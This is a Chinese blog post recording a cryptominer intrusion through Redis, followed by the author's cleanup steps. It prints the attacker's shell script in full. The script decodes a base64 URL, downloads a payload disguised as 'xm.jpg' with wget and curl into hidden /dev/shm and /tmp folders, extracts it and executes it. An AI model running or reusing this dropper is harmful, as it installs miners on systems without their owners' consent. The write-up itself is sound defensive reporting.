图图
发布于 2023-05-26 / 201 阅读 / 0 评论 / 0 点赞

记录一次被挖矿脚本攻击

参考链接:https://www.bilibili.com/read/cv18878169/

我遇到的情况与链接中的脚本一模一样,不过服务器细节不太一样,用作参考。

查看redis,发现有几条异常记录

base64以及脚本指向的地址:s.na-cs.com

脚本下载下来以后内容:

#!/bin/bash
echo 'here is ai.sh'
proxyport=80
media_url=$(echo aHR0cDovL3MubmEtY3MuY29tL2IyZjYyOC9tL3htLmpwZwo=|base64 -d)
check_exist()
{
#try other way
if [ -x /usr/bin/netstat -o /bin/netstat ]
then
for pt in $(netstat -an|grep EST|grep "$proxyport"|awk '{print $5}'|awk -F ":" '{print $NF}')
do
   if [ "$pt" == "$proxyport" ];then
   echo "miner running"
   exit 1
   else
   echo "miner may not running,check next port"
   fi
done
else
        echo "haha"
fi
}
mkdir -p /dev/shm/.11 && cd /dev/shm/.11 && wget $media_url && tar -xf xm.jpg && chmod +x start && ./start
sleep 3
check_exist
mkdir -p /tmp/.11 && cd /tmp/.11 && curl $media_url -o xm.jpg && tar -xf xm.jpg && chmod +x start && ./start

ll -rta查看

先把密钥给删了

查看定时任务和定时任务记录都没有找到,除了我自己的acme的脚本没有找到其他脚本的执行。

服务器的cpu使用率也是正常的。

最后因为项目业务刚部署没多久,也没得啥用户,领导直接让换了服务器(手动狗头)